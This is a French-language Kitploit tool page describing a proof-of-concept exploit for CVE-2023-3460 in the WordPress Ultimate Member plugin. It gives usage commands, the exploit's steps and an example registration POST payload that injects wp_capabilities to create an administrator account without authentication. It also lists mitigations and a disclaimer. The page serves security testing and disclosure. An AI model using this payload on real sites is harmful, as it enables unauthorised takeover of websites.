Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-3460 — Preuve de concept pour CVE-2023-3460, une vulnérabilité d'escalade de privilèges dans WordPress Ultimate Member. Crée un compte administrateur via une demande d'inscription modifiée. Pour tests autorisés uniquement. | Kitploit
Outils/GitHubGitHub/gurjotexpert/cve-2023-3460
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionApprentissage et Éducation
GitHubgurjotexpert/cve-2023-3460

CVE-2023-3460

Preuve de concept pour CVE-2023-3460, une vulnérabilité d'escalade de privilèges dans WordPress Ultimate Member. Crée un compte administrateur via une demande d'inscription modifiée. Pour tests autorisés uniquement.

Voir le dépôt
11il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🚨 CVE-2023-3460 - Exploitation d'escalade de privilèges dans Ultimate Member WordPress

Il s'agit d'un exploit proof-of-concept (PoC) pour CVE-2023-3460, une vulnérabilité critique dans le plugin WordPress Ultimate Member. Il permet à des utilisateurs non authentifiés d'élever leurs privilèges au niveau Administrateur en créant une demande d'inscription malveillante.

🔥 Impact : Compromission complète du site via la création d'un compte administrateur non autorisé.


📌 Détails de la vulnérabilité

  • Plugin concerné : Ultimate Member
  • Versions affectées : ≤ 2.6.6
  • Version corrigée : 2.6.7
  • Type d'exploit : Escalade de privilèges via abus d'inscription
  • Authentification requise : ❌ Non
  • CVE : CVE-2023-3460

⚙️ Prérequis

  • Python 3
  • requests library
  • urllib3 library
  • beautifulsoup4 library
  • Installer les prérequis :

    root@kitploit:~
    pip3 install requests urllib3 beautifulsoup4
    

    🧪 Utilisation de l'exploit

    root@kitploit:~
    python3 CVE-2023-3460.py -t <TARGET_URL> -u <NEW_USERNAME> -p <NEW_PASSWORD> 
    

    ✅ Exemple :

    root@kitploit:~
    python3 CVE-2023-3460.py -t http://localhost/register/ -u pwnadmin -p Pass@123 
    

    📥 Fonctionnalités du script d'exploit

    • Récupère le nonce CSRF (_wpnonce) depuis la page d'inscription
    • Contourne la validation du formulaire
    • Injecte wp_capabilities avec le rôle administrator
    • Crée un nouvel utilisateur administrateur sans authentification

    🔐 Exemple de charge utile de l'exploit

    root@kitploit:~
    POST /register/ HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    
    user_login=pwnadmin&
    [email protected]&
    user_password=Pass@123&
    wp_càpabilities[administrator]=1&
    _um_nonce=<nonce_value>
    

    🛡️ Atténuation

    • Mettre à jour le plugin Ultimate Member vers v2.6.7 ou ultérieure
    • Désactiver l'inscription ouverte si non nécessaire
    • Surveiller les journaux de création d'utilisateurs pour toute activité suspecte

    📚 Références

    • 🔗 Patchstack Advisory
    • 🔗 CVE-2023-3460 sur NVD

    ⚠️ Avertissement

    Ce script est fourni à des fins éducatives et de tests autorisés uniquement. L'exploitation non autorisée de systèmes est illégale et contraire à l'éthique. Utilisez-le uniquement sur des systèmes dont vous êtes propriétaire ou pour lesquels vous avez l'autorisation de tester.


    👨‍💻 Auteur

    • 💀 [GURJOT SINGH]
    • 🔒 [Linkdin: https://in.linkedin.com/in/gurjot-singh-8198b3220]
    Télécharger l’outil